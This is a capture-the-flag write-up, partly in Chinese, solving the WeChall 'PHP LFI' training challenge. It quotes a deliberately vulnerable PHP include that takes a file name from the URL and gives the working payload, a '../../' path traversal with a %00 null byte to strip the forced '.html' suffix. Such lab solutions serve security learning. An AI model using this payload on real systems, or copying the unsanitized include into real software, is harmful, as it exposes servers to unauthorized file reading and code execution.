[WeChall] Training: PHP LFI (Exploit, PHP,Tra..
题目
[WeChall] Training: PHP LFI (Exploit, PHP, Training)
Your mission is to exploit this code, which has obviously an LFI vulnerability:
GeSHi`ed PHP code
$filename = 'pages/'.(isset($_GET["file"])?$_GET["file"]:"welcome").'.html';
include $filename;
There is a lot of important stuff in ../solution.php, so please include and execute this file for us.
Here are a few examples of the script in action (in the box below):
index.php?file=welcome
index.php?file=news
index.php?file=forums
分析
这是关于利用文件包含漏洞的题目。 目标是执行../solution.php
文件。
题目的网址是:http://www.wechall.net/challenge/training/php/lfi/up/index.php
复制一下../solution.php
的地址,
可以看到是http://www.wechall.net/challenge/training/php/lfi/solution.php
所以应该是../../
而不是 ../
, 因为从index.php跳转到solution.php需要经过两个父目录。
但是直接提交?file=../../solution.php
会出错,提示找不到文件pages/../../solution.php.html
可以看到后面多了个.html
,可以利用空字节%00
来过滤掉后面的.html
解决
最终只要浏览器访问下面地址,即可解题成功:
http://www.wechall.net/challenge/training/php/lfi/up/index.php?file=../../solution.php%00